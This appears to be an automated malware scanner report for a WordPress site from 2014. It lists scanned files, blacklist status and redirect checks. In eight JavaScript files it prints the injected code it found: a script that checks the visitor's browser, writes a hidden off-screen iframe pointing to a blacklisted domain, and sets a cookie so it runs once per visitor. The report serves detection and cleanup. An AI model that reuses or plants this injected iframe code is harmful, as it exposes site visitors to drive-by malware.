New scan:

Malware Scanner report for bulletindigest.com

Malicious/Suspicious/Total urls checked
8/0/15
8 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "bulletindigest.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
8/0/8
8 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bulletindigest.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bulletindigest.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://bulletindigest.com/
200 OK
Content-Length: 48187
Content-Type: text/html
clean
http://bulletindigest.com/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://bulletindigest.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://bulletindigest.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1
200 OK
Content-Length: 21855
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();
var NO_JQUERY = {};
(function(window,
...[3071 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://bulletindigest.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1
200 OK
Content-Length: 7830
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();
(function ($) {
var inviewObjects =
...[3263 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://bulletindigest.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1
200 OK
Content-Length: 10344
Content-Type: application/javascript
malicious
Page code contains blacklisted domain: signalropeta.octodrip.com

...[968 bytes skipped]...
ows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);
/*The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.*/
if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();
/*
Each version is given a distinguishing version number. If the Program
sp
...[2486 bytes skipped]...

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438
200 OK
Content-Length: 9301
Content-Type: application/x-javascript
clean
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa
200 OK
Content-Length: 21442
Content-Type: application/x-javascript
clean
http://bulletindigest.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.0
200 OK
Content-Length: 3199
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();
WPGroHo = jQuery.extend( {
my_hash:
...[995 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://bulletindigest.com/wp-content/themes/iconic-one/js/selectnav.js?ver=1.0
200 OK
Content-Length: 6435
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();


window.selectnav = (function(
...[3949 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://bulletindigest.com/wp-content/plugins/clickdesk-live-support-chat-plugin/js/widget.js?ver=1.0.1
200 OK
Content-Length: 2731
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();
var glcpath = (('https:' == document.loca
...[473 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://bulletindigest.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=20121205
200 OK
Content-Length: 41417
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();
var WPCOMSharing = {
done_urls : [],
...[3116 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">

http://stats.wp.com/e-201438.js
200 OK
Content-Length: 824
Content-Type: application/x-javascript
clean
http://bulletindigest.com/about/
200 OK
Content-Length: 43214
Content-Type: text/html
clean
http://bulletindigest.com/wp-content/plugins/akismet/_inc/form.js?ver=3.0.2
200 OK
Content-Length: 2940
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: signalropeta.octodrip.com

...[249 bytes skipped]...
ned;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);

if (!Smiledbob && assa_a) {
document.write('<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();

}
}
Lightebrothermind();
var ak_js = document.getElementById( "ak_
...[748 bytes skipped]...

Decoded script:


<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>

Malicious iFrame found.
size: 200x200     
src: http://signalropeta.octodrip.com/iftikajoman16.html
This URL is marked by Google as suspicious

<iframe src="http://signalropeta.octodrip.com/iftikajoman16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bulletindigest.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 07:08:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/3xCUr>; rel=shortlink
Set-Cookie: PHPSESSID=7c6898ef3c42c8656faf0c4a46395ea6; path=/
Set-Cookie: wfvt_2897220436=541e796ee2498; expires=Sun, 21-Sep-2014 07:38:30 GMT; path=/; httponly
X-Pingback: http://bulletindigest.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: bulletindigest.com
Referer: http://www.google.com/search?q=bulletindigest.com

Result:
The result is similar to the first query. There are no suspicious redirects found.